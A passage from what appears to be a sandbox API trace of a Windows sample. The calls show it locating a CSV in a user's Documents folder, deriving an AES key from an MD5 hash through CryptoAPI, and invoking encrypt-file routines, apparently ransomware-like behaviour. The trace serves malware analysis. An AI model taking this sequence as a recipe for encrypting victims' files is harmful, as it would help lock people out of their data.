lpString1="\\x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="khSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hSA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SA9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uDUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZMBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Bxf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xf\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.428] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ob0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0178.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b0CMu.csv\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0178.429] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0178.429] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0178.429] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0178.429] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0178.429] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".csv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0178.429] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.429] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.429] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.429] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0178.429] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.429] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f218dd0, ftCreationTime.dwHighDateTime=0x1d5de91, ftLastAccessTime.dwLowDateTime=0xe8234710, ftLastAccessTime.dwHighDateTime=0x1d5e071, ftLastWriteTime.dwLowDateTime=0xe8234710, ftLastWriteTime.dwHighDateTime=0x1d5e071, nFileSizeHigh=0x0, nFileSizeLow=0x16989, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Ob0CMu.csv", cAlternateFileName="")) returned 0x90ae18 [0178.429] FindClose (in: hFindFile=0x90ae18 | out: hFindFile=0x90ae18) returned 1 [0178.429] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.429] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.429] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.429] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.430] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0178.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.430] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0178.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0178.430] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.430] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.430] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.430] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.430] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0178.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.430] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0178.431] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.431] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.431] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0178.431] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.431] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.431] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.431] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.431] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.431] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.431] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.432] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0178.432] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.432] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0178.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0178.432] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.432] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0178.432] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.432] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.432] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.432] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.432] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.432] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.432] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.432] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.433] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.433] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.433] CryptHashData (hHash=0x90af58, pbData=0x8ded80, dwDataLen=0x19, dwFlags=0x1) returned 1 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.433] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.433] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.457] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0178.457] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0178.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.457] CryptDeriveKey (in: hProv=0x9c0b78, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0178.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.457] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.457] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0178.457] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0178.457] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0178.458] CryptDestroyHash (hHash=0x90af58) returned 1 [0178.458] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.458] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.459] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\Ob0CMu.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\x6khsa9uduzmbxf\\ob0cmu.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0178.459] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.459] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0178.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0178.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0178.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.459] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.459] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.459] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af58 [0178.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0178.460] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2858 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0178.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d480 | out: hHeap=0x8a0000) returned 1 [0178.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0178.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0178.460] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0178.460] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.461] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x8fecd8 [0178.461] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: 